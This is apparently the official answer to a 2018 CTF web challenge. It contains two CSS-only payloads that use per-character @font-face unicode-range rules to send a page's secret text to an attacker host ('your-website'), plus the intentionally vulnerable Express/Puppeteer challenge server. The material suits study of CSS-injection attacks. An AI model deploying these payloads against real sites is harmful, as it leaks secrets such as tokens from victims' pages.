HarekazeCTF 2018 Web250-A custom CSS for the flag (Official answer)
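/*
 * HarekazeCTF 2018 Web250 — CSS-only exfiltration of the text in #flag,
 * variant 1 (characters are reported front to back).
 *
 * Every @font-face below is restricted with unicode-range to one code point
 * and has its src pointed at the attacker's server with that character in
 * the query string. A browser (Chromium in this challenge) only fetches a
 * web font once it has to render a glyph inside the font's range, so one
 * request per distinct character present in the styled text reaches
 * your-website — no script execution is needed.
 *
 * Ordering: #flag's width is animated from 10px up to 500px over 10s and
 * word-break: break-all allows a line break between any two characters, so
 * characters enter ::first-line one after another from the front. The probe
 * fonts are applied to ::first-line only, which is what makes the requests
 * arrive in text order.
 *
 * Caveats when reading the server log:
 *  - a font is fetched once, so a character that repeats is reported once;
 *  - only A-Z, a-z, '_' and '-' are covered; digits or other symbols in the
 *    text are never reported (add rules if the charset is wider);
 *  - the fixed wrapper text around the flag (e.g. "HarekazeCTF{") triggers
 *    requests as well.
 * Replace your-website with a host you control and log the query string.
 *
 * Fixes against the originally published payload:
 *  - 'Capital-B' requested '?CB' instead of '?B';
 *  - 'under' (U+005F) and 'hyphen' (U+002D) had their query tokens swapped;
 *  - the ::first-line list spelled the family 'hypen', so '-' never fired.
 */
@font-face { font-family: 'Capital-A'; src: url('http://your-website?A'); unicode-range: U+0041; }
@font-face { font-family: 'Capital-B'; src: url('http://your-website?B'); unicode-range: U+0042; }
@font-face { font-family: 'Capital-C'; src: url('http://your-website?C'); unicode-range: U+0043; }
@font-face { font-family: 'Capital-D'; src: url('http://your-website?D'); unicode-range: U+0044; }
@font-face { font-family: 'Capital-E'; src: url('http://your-website?E'); unicode-range: U+0045; }
@font-face { font-family: 'Capital-F'; src: url('http://your-website?F'); unicode-range: U+0046; }
@font-face { font-family: 'Capital-G'; src: url('http://your-website?G'); unicode-range: U+0047; }
@font-face { font-family: 'Capital-H'; src: url('http://your-website?H'); unicode-range: U+0048; }
@font-face { font-family: 'Capital-I'; src: url('http://your-website?I'); unicode-range: U+0049; }
@font-face { font-family: 'Capital-J'; src: url('http://your-website?J'); unicode-range: U+004A; }
@font-face { font-family: 'Capital-K'; src: url('http://your-website?K'); unicode-range: U+004B; }
@font-face { font-family: 'Capital-L'; src: url('http://your-website?L'); unicode-range: U+004C; }
@font-face { font-family: 'Capital-M'; src: url('http://your-website?M'); unicode-range: U+004D; }
@font-face { font-family: 'Capital-N'; src: url('http://your-website?N'); unicode-range: U+004E; }
@font-face { font-family: 'Capital-O'; src: url('http://your-website?O'); unicode-range: U+004F; }
@font-face { font-family: 'Capital-P'; src: url('http://your-website?P'); unicode-range: U+0050; }
@font-face { font-family: 'Capital-Q'; src: url('http://your-website?Q'); unicode-range: U+0051; }
@font-face { font-family: 'Capital-R'; src: url('http://your-website?R'); unicode-range: U+0052; }
@font-face { font-family: 'Capital-S'; src: url('http://your-website?S'); unicode-range: U+0053; }
@font-face { font-family: 'Capital-T'; src: url('http://your-website?T'); unicode-range: U+0054; }
@font-face { font-family: 'Capital-U'; src: url('http://your-website?U'); unicode-range: U+0055; }
@font-face { font-family: 'Capital-V'; src: url('http://your-website?V'); unicode-range: U+0056; }
@font-face { font-family: 'Capital-W'; src: url('http://your-website?W'); unicode-range: U+0057; }
@font-face { font-family: 'Capital-X'; src: url('http://your-website?X'); unicode-range: U+0058; }
@font-face { font-family: 'Capital-Y'; src: url('http://your-website?Y'); unicode-range: U+0059; }
@font-face { font-family: 'Capital-Z'; src: url('http://your-website?Z'); unicode-range: U+005A; }
@font-face { font-family: 'Small-a'; src: url('http://your-website?a'); unicode-range: U+0061; }
@font-face { font-family: 'Small-b'; src: url('http://your-website?b'); unicode-range: U+0062; }
@font-face { font-family: 'Small-c'; src: url('http://your-website?c'); unicode-range: U+0063; }
@font-face { font-family: 'Small-d'; src: url('http://your-website?d'); unicode-range: U+0064; }
@font-face { font-family: 'Small-e'; src: url('http://your-website?e'); unicode-range: U+0065; }
@font-face { font-family: 'Small-f'; src: url('http://your-website?f'); unicode-range: U+0066; }
@font-face { font-family: 'Small-g'; src: url('http://your-website?g'); unicode-range: U+0067; }
@font-face { font-family: 'Small-h'; src: url('http://your-website?h'); unicode-range: U+0068; }
@font-face { font-family: 'Small-i'; src: url('http://your-website?i'); unicode-range: U+0069; }
@font-face { font-family: 'Small-j'; src: url('http://your-website?j'); unicode-range: U+006A; }
@font-face { font-family: 'Small-k'; src: url('http://your-website?k'); unicode-range: U+006B; }
@font-face { font-family: 'Small-l'; src: url('http://your-website?l'); unicode-range: U+006C; }
@font-face { font-family: 'Small-m'; src: url('http://your-website?m'); unicode-range: U+006D; }
@font-face { font-family: 'Small-n'; src: url('http://your-website?n'); unicode-range: U+006E; }
@font-face { font-family: 'Small-o'; src: url('http://your-website?o'); unicode-range: U+006F; }
@font-face { font-family: 'Small-p'; src: url('http://your-website?p'); unicode-range: U+0070; }
@font-face { font-family: 'Small-q'; src: url('http://your-website?q'); unicode-range: U+0071; }
@font-face { font-family: 'Small-r'; src: url('http://your-website?r'); unicode-range: U+0072; }
@font-face { font-family: 'Small-s'; src: url('http://your-website?s'); unicode-range: U+0073; }
@font-face { font-family: 'Small-t'; src: url('http://your-website?t'); unicode-range: U+0074; }
@font-face { font-family: 'Small-u'; src: url('http://your-website?u'); unicode-range: U+0075; }
@font-face { font-family: 'Small-v'; src: url('http://your-website?v'); unicode-range: U+0076; }
@font-face { font-family: 'Small-w'; src: url('http://your-website?w'); unicode-range: U+0077; }
@font-face { font-family: 'Small-x'; src: url('http://your-website?x'); unicode-range: U+0078; }
@font-face { font-family: 'Small-y'; src: url('http://your-website?y'); unicode-range: U+0079; }
@font-face { font-family: 'Small-z'; src: url('http://your-website?z'); unicode-range: U+007A; }
/* U+005F is '_' and U+002D is '-'; the query token now matches the range. */
@font-face { font-family: 'under';  src: url('http://your-website?_'); unicode-range: U+005F; }
@font-face { font-family: 'hyphen'; src: url('http://your-website?-'); unicode-range: U+002D; }

#flag {
  /* Grow the box over 10s so characters join the first line one by one;
     break-all lets the line break fall between any two characters. The
     crawler in server.js waits 20s, long enough for this to complete. */
  animation: fade 10s linear;
  word-break: break-all;
}

/* Only the first line gets the probe fonts; text that has not yet entered
   it is rendered with the default font and triggers nothing. */
#flag::first-line {
  font-family: 'under', 'hyphen',
    'Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F',
    'Capital-G', 'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L',
    'Capital-M', 'Capital-N', 'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R',
    'Capital-S', 'Capital-T', 'Capital-U', 'Capital-V', 'Capital-W', 'Capital-X',
    'Capital-Y', 'Capital-Z',
    'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f',
    'Small-g', 'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l',
    'Small-m', 'Small-n', 'Small-o', 'Small-p', 'Small-q', 'Small-r',
    'Small-s', 'Small-t', 'Small-u', 'Small-v', 'Small-w', 'Small-x',
    'Small-y', 'Small-z';
}

@keyframes fade {
  0%   { width: 10px; }
  100% { width: 500px; }
}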
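/*
 * HarekazeCTF 2018 Web250 — CSS-only exfiltration of the text in #flag,
 * variant 2. Original author's note: 前から後ろ ("front to back").
 *
 * Same per-character unicode-range probe fonts as variant 1 (one request
 * to your-website per distinct character that gets rendered with them),
 * but wired the other way round: the probe fonts are set on #flag itself
 * and switched off for ::first-line, and the box is animated from 500px
 * down to 10px. As the first line shrinks, characters are pushed off its
 * end onto the following lines, where the probe fonts apply and the font
 * request fires — so the requests should arrive starting from the end of
 * the text (last character first); confirm the order against your log.
 *
 * Same caveats as variant 1: a repeated character is reported once, only
 * A-Z, a-z, '_' and '-' are covered, and the fixed wrapper text around the
 * flag (e.g. "HarekazeCTF{") is reported too.
 *
 * Fixes against the originally published payload:
 *  - 'under' (U+005F) and 'hyphen' (U+002D) had their query tokens swapped;
 *  - the #flag font list spelled the family 'hypen', so '-' never fired.
 */
@font-face { font-family: 'Capital-A'; src: url('http://your-website?A'); unicode-range: U+0041; }
@font-face { font-family: 'Capital-B'; src: url('http://your-website?B'); unicode-range: U+0042; }
@font-face { font-family: 'Capital-C'; src: url('http://your-website?C'); unicode-range: U+0043; }
@font-face { font-family: 'Capital-D'; src: url('http://your-website?D'); unicode-range: U+0044; }
@font-face { font-family: 'Capital-E'; src: url('http://your-website?E'); unicode-range: U+0045; }
@font-face { font-family: 'Capital-F'; src: url('http://your-website?F'); unicode-range: U+0046; }
@font-face { font-family: 'Capital-G'; src: url('http://your-website?G'); unicode-range: U+0047; }
@font-face { font-family: 'Capital-H'; src: url('http://your-website?H'); unicode-range: U+0048; }
@font-face { font-family: 'Capital-I'; src: url('http://your-website?I'); unicode-range: U+0049; }
@font-face { font-family: 'Capital-J'; src: url('http://your-website?J'); unicode-range: U+004A; }
@font-face { font-family: 'Capital-K'; src: url('http://your-website?K'); unicode-range: U+004B; }
@font-face { font-family: 'Capital-L'; src: url('http://your-website?L'); unicode-range: U+004C; }
@font-face { font-family: 'Capital-M'; src: url('http://your-website?M'); unicode-range: U+004D; }
@font-face { font-family: 'Capital-N'; src: url('http://your-website?N'); unicode-range: U+004E; }
@font-face { font-family: 'Capital-O'; src: url('http://your-website?O'); unicode-range: U+004F; }
@font-face { font-family: 'Capital-P'; src: url('http://your-website?P'); unicode-range: U+0050; }
@font-face { font-family: 'Capital-Q'; src: url('http://your-website?Q'); unicode-range: U+0051; }
@font-face { font-family: 'Capital-R'; src: url('http://your-website?R'); unicode-range: U+0052; }
@font-face { font-family: 'Capital-S'; src: url('http://your-website?S'); unicode-range: U+0053; }
@font-face { font-family: 'Capital-T'; src: url('http://your-website?T'); unicode-range: U+0054; }
@font-face { font-family: 'Capital-U'; src: url('http://your-website?U'); unicode-range: U+0055; }
@font-face { font-family: 'Capital-V'; src: url('http://your-website?V'); unicode-range: U+0056; }
@font-face { font-family: 'Capital-W'; src: url('http://your-website?W'); unicode-range: U+0057; }
@font-face { font-family: 'Capital-X'; src: url('http://your-website?X'); unicode-range: U+0058; }
@font-face { font-family: 'Capital-Y'; src: url('http://your-website?Y'); unicode-range: U+0059; }
@font-face { font-family: 'Capital-Z'; src: url('http://your-website?Z'); unicode-range: U+005A; }
@font-face { font-family: 'Small-a'; src: url('http://your-website?a'); unicode-range: U+0061; }
@font-face { font-family: 'Small-b'; src: url('http://your-website?b'); unicode-range: U+0062; }
@font-face { font-family: 'Small-c'; src: url('http://your-website?c'); unicode-range: U+0063; }
@font-face { font-family: 'Small-d'; src: url('http://your-website?d'); unicode-range: U+0064; }
@font-face { font-family: 'Small-e'; src: url('http://your-website?e'); unicode-range: U+0065; }
@font-face { font-family: 'Small-f'; src: url('http://your-website?f'); unicode-range: U+0066; }
@font-face { font-family: 'Small-g'; src: url('http://your-website?g'); unicode-range: U+0067; }
@font-face { font-family: 'Small-h'; src: url('http://your-website?h'); unicode-range: U+0068; }
@font-face { font-family: 'Small-i'; src: url('http://your-website?i'); unicode-range: U+0069; }
@font-face { font-family: 'Small-j'; src: url('http://your-website?j'); unicode-range: U+006A; }
@font-face { font-family: 'Small-k'; src: url('http://your-website?k'); unicode-range: U+006B; }
@font-face { font-family: 'Small-l'; src: url('http://your-website?l'); unicode-range: U+006C; }
@font-face { font-family: 'Small-m'; src: url('http://your-website?m'); unicode-range: U+006D; }
@font-face { font-family: 'Small-n'; src: url('http://your-website?n'); unicode-range: U+006E; }
@font-face { font-family: 'Small-o'; src: url('http://your-website?o'); unicode-range: U+006F; }
@font-face { font-family: 'Small-p'; src: url('http://your-website?p'); unicode-range: U+0070; }
@font-face { font-family: 'Small-q'; src: url('http://your-website?q'); unicode-range: U+0071; }
@font-face { font-family: 'Small-r'; src: url('http://your-website?r'); unicode-range: U+0072; }
@font-face { font-family: 'Small-s'; src: url('http://your-website?s'); unicode-range: U+0073; }
@font-face { font-family: 'Small-t'; src: url('http://your-website?t'); unicode-range: U+0074; }
@font-face { font-family: 'Small-u'; src: url('http://your-website?u'); unicode-range: U+0075; }
@font-face { font-family: 'Small-v'; src: url('http://your-website?v'); unicode-range: U+0076; }
@font-face { font-family: 'Small-w'; src: url('http://your-website?w'); unicode-range: U+0077; }
@font-face { font-family: 'Small-x'; src: url('http://your-website?x'); unicode-range: U+0078; }
@font-face { font-family: 'Small-y'; src: url('http://your-website?y'); unicode-range: U+0079; }
@font-face { font-family: 'Small-z'; src: url('http://your-website?z'); unicode-range: U+007A; }
/* U+005F is '_' and U+002D is '-'; the query token now matches the range. */
@font-face { font-family: 'under';  src: url('http://your-website?_'); unicode-range: U+005F; }
@font-face { font-family: 'hyphen'; src: url('http://your-website?-'); unicode-range: U+002D; }

#flag {
  /* Shrink the box over 10s; break-all lets the break fall between any two
     characters, so they spill off the first line one at a time. The crawler
     in server.js waits 20s, long enough for this to complete. */
  animation: fade 10s linear;
  word-break: break-all;
  /* Probe fonts apply to everything in #flag ... */
  font-family: 'under', 'hyphen',
    'Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F',
    'Capital-G', 'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L',
    'Capital-M', 'Capital-N', 'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R',
    'Capital-S', 'Capital-T', 'Capital-U', 'Capital-V', 'Capital-W', 'Capital-X',
    'Capital-Y', 'Capital-Z',
    'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f',
    'Small-g', 'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l',
    'Small-m', 'Small-n', 'Small-o', 'Small-p', 'Small-q', 'Small-r',
    'Small-s', 'Small-t', 'Small-u', 'Small-v', 'Small-w', 'Small-x',
    'Small-y', 'Small-z';
}

/* ... except the first line. 'none' is not a keyword for font-family; it
   simply names a family that is not declared (and presumably not installed),
   so the first line falls back to the default font and loads no probe font.
   A generic family such as serif would express the same intent more
   clearly. */
#flag::first-line {
  font-family: none;
}

@keyframes fade {
  0%   { width: 500px; }
  100% { width: 10px; }
}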
'use strict';
// HarekazeCTF 2018 Web250 challenge server. Two Express apps:
//  - `app`  (port 3001, public): the crawler form and POST /crawl.html;
//  - `app2` (port 3002, bound to localhost below): the flag page that loads
//    a caller-supplied stylesheet, meant to be visited only by the headless
//    Chromium that crawl() starts.
const express = require("express");
const bodyParser = require('body-parser');
const puppeteer = require('puppeteer');
const https = require('https'); // not used anywhere in this file
const fs = require("fs");
const app = express();
const request = require("request");
// Accept both form-encoded bodies (the reCAPTCHA form) and JSON bodies.
app.use(bodyParser.urlencoded({ extended: true }))
app.use(bodyParser.json())
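/**
 * POST /crawl.html handler.
 *
 * Verifies the reCAPTCHA token from the form, replies "Crawling", then
 * drives a headless Chromium at the local flag page with the caller-chosen
 * stylesheet URL (`req.body.css`). Whatever that stylesheet leaks (e.g. via
 * per-character font requests) is therefore triggered by a browser that can
 * see the flag — this is the intended attack surface of the challenge.
 *
 * Body fields: `g-recaptcha-response` (string token) and `css` (string URL
 * starting with http:// or https://, the same rule app2 enforces).
 *
 * Differences from the original handler: the token and the remote address
 * are percent-encoded so a crafted token cannot add or override parameters
 * of the siteverify request; `css` is validated here and passed as one
 * encoded query parameter instead of being concatenated raw into the URL
 * (a raw `&` or `#` would have split it); a failed siteverify request or a
 * non-JSON reply is reported as a reCAPTCHA error instead of throwing inside
 * the callback; the browser is always closed, even when the crawl fails.
 *
 * @param {import('express').Request} req
 * @param {import('express').Response} res
 */
async function crawl(req, res) {
  const token = req.body['g-recaptcha-response'];
  const css = req.body.css;

  if (!token || typeof token !== 'string') {
    res.send("ReCAPTCHA error.");
    return;
  }
  // Same check the flag page (app2) applies; rejecting here avoids a
  // pointless browser launch and keeps non-string bodies out of the URL.
  if (typeof css !== 'string' ||
      !(css.startsWith("http://") || css.startsWith("https://"))) {
    res.send("Bad URI");
    return;
  }

  // encodeURIComponent rather than a template of raw values: the token is
  // user input and must not be able to inject extra query parameters.
  const verificationUrl = 'https://www.google.com/recaptcha/api/siteverify'
    + `?secret=${encodeURIComponent(String(process.env.RECAPTCHA_SECRET))}`
    + `&response=${encodeURIComponent(token)}`
    + `&remoteip=${encodeURIComponent(String(req.connection.remoteAddress))}`;

  request(verificationUrl, async function (error, response, body) {
    let recaptcha;
    try {
      if (error) throw error;
      recaptcha = JSON.parse(body);
    } catch (err) {
      // Network failure or a non-JSON reply: treat as "not verified"
      // rather than letting the exception escape the callback.
      console.error('reCAPTCHA verification failed:', err);
      res.send("ReCAPTCHA error.");
      return;
    }
    if (recaptcha.success !== true) {
      res.send("ReCAPTCHA error.");
      return;
    }

    // Answer before the slow crawl so the client is not kept waiting.
    res.send("Crawling");

    // The flag page decodes the query string once, so it receives exactly
    // the string the caller submitted.
    const target = "http://127.0.0.1:3002/flag.html?css=" + encodeURIComponent(css);

    let browser;
    try {
      browser = await puppeteer.launch({ executablePath: '/usr/bin/chromium' });
      const page = await browser.newPage();
      await page.goto(target, { waitUntil: "load" });
      // The reference payloads animate for 10s; leave the page up long
      // enough for all of their font requests to go out.
      await page.waitFor(20000);
    } catch (err) {
      console.error('crawl failed:', err);
    } finally {
      // Without this a failed crawl leaks one Chromium process per request.
      if (browser) await browser.close();
    }
  });
}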
// Source disclosure is deliberate: the challenge hands out its own server
// code. The absolute path ties this to the container layout (/app).
app.get('/server.js',function (req, res) { res.sendFile("/app/server.js") });
app.post('/crawl.html', crawl);
// Static front end (the form with the reCAPTCHA widget). Registered after
// the explicit routes, which Express therefore matches first.
app.use('/', express.static('public'));
// Public front end: the crawler form and the /crawl.html endpoint.
const server = app.listen(3001, () => {
  const { address, port } = server.address();
  console.log('CSS-Injection http://%s:%s', address, port);
});
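// Internal flag page. It is bound to "localhost" below, so the headless
// browser started by crawl() is the only intended client; anything that page
// loads runs in a browser that can see the flag.
const app2 = express();

/**
 * Escape a string for use inside a double-quoted HTML attribute value.
 * @param {string} s
 * @returns {string}
 */
function escapeHtmlAttr(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

/**
 * GET /flag.html?css=<url>
 *
 * Renders the flag inside #flag and links the stylesheet at `css`. The only
 * restriction on `css` is the scheme check — an attacker-controlled
 * stylesheet host is the point of the challenge.
 *
 * Differences from the original: a repeated parameter (`?css=a&css=b`
 * parses to an array) or any non-string value now gets "Bad URI" instead of
 * a TypeError/500, and the href is HTML-attribute-escaped on top of
 * encodeURI, so a literal `&` can neither be misread as an entity nor
 * break the attribute.
 */
app2.get('/flag.html', function (req, res) {
  console.log(req.connection.remoteAddress);
  const css = req.query.css;
  if (typeof css !== 'string' ||
      !(css.startsWith("http://") || css.startsWith("https://"))) {
    res.send("Bad URI");
    return;
  }
  // encodeURI keeps the URL usable (it leaves :/?&=# untouched and encodes
  // spaces, quotes and angle brackets); the attribute escape covers the rest.
  const href = escapeHtmlAttr(encodeURI(css));
  // Read on every request, as the original did; note the path is relative to
  // the process's working directory and a missing file surfaces as a 500.
  const flag = fs.readFileSync("flag.txt", "utf8");
  res.send(`<html>
<link rel="stylesheet" href="${href}" />
<body>
<div id="flag">
HarekazeCTF{${flag}}
</div>
</body>
</html>`);
});

// Loopback only: not reachable from outside the host.
const server2 = app2.listen(3002, "localhost");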